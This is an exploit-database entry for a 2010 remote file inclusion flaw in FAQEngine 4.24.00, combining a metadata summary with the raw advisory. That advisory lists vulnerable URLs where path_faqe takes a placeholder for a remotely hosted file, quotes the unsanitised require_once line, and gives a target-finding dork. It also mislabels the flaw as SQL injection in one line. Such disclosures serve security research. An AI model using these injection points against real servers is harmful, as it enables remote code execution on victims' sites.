FAQEngine 4.24.00 - Remote File Inclusion vulnerability

vendor:

FAQEngine

by:

kaMtiEz

7,5

CVSS

HIGH

RFI

CWE

Product Name: FAQEngine

Affected Version From: 4.24.00

Affected Version To: 4.24.00

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2010

FAQEngine 4.24.00 – Remote File Inclusion vulnerability

FAQEngine 4.24.00 is vulnerable to Remote File Inclusion (RFI) vulnerability. An attacker can exploit this vulnerability by sending a malicious URL to the application. The malicious URL contains a malicious file which is hosted on a remote server. When the application receives the malicious URL, it will include the malicious file and execute it on the server.

Mitigation:

Update to the latest version of the application.

Source

Exploit-DB raw data:

###################################################################################
                                                                                  #
[~] FAQEngine 4.24.00 - Remote File Inclusion vulnerability   [ RFI ]             #
[~] Author	: kaMtiEz (kamzcrew@gmail.com)                                    #
[~] Homepage	: http://www.indonesiancoder.com                                  #
[~] Date	: January 6, 2010                                                 #
                                                                                  #
###################################################################################

[ Software Information ]

[+] Vendor : http://www.boesch-it.de/
[+] Download : http://www.boesch-it.de/sw/faqengine.php?lang=en
[+] version : 4.24.00 or lower maybe also affected
[+] Vulnerability : SQL injection
[+] Dork : "Think iT"
[+] Price : -            
[+] Location : INDONESIA - JOGJA

##################################################################################


[ HERE WE GO .. LIVE FROM JOGJA CITY ]

[ Vulnerable File ]

http://127.0.0.1/[kaMtiEz]/attachs.php?path_faqe=[INDONESIANCODER]
http://127.0.0.1/[kaMtiEz]/backup.php?path_faqe=[INDONESIANCODER]
http://127.0.0.1/[kaMtiEz]/badwords.php?path_faqe=[INDONESIANCODER]
http://127.0.0.1/[kaMtiEz]/categories.php?path_faqe=[INDONESIANCODER]
http://127.0.0.1/[kaMtiEz]/changepw.php?path_faqe=[INDONESIANCODER]
http://127.0.0.1/[kaMtiEz]/colorchooser.php?path_faqe=[INDONESIANCODER]
http://127.0.0.1/[kaMtiEz]/colorwheel.php?path_faqe=[INDONESIANCODER]
http://127.0.0.1/[kaMtiEz]/dbfiles.php?path_faqe=[INDONESIANCODER]
http://127.0.0.1/[kaMtiEz]/diraccess.php?path_faqe=[INDONESIANCODER]
http://127.0.0.1/[kaMtiEz]/faq.php?path_faqe=[INDONESIANCODER]
http://127.0.0.1/[kaMtiEz]/index.php?path_faqe=[INDONESIANCODER]
http://127.0.0.1/[kaMtiEz]/kb.php?path_faqe=[INDONESIANCODER]
http://127.0.0.1/[kaMtiEz]/stats.php?path_faqe=[INDONESIANCODER]

etc etc etc .. too much ..

[ ERROR IN ]

require_once($path_faqe."/includes/global.inc.php");

[ FIX ] 

dunno .. :P~~

===========================================================================

[ Thx TO ]

[+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW MainHack ServerIsDown SurabayaHackerLink
[+] tukulesto,M3NW5,arianom,tiw0L,abah_benu,d0ntcry ..
[+] Contrex,onthel,yasea,bugs,Ronz,Pathloader,cimpli
[+] Coracore,Gh4mb4s,Jack-,VycOd,m0rgue a.k.a mbamboenk

[ NOTE ] 

[+] Nyak ama babe gua .. tak lupa adik gua ..
[+] sendiri dingin sepi ... tanpa sengaja menemukan celah ke 2x nya ..
[+] Dengerin Radio yach di http://antisecradio.fm manteb2 loh .. :D

[ QUOTE ]

[+] KEEP MOVIN .. !
[+] INDONESIANCODER still r0x

[ EOF ]

[+] INDONESIANOCODER TEAM
[+] KILL -9 TEAM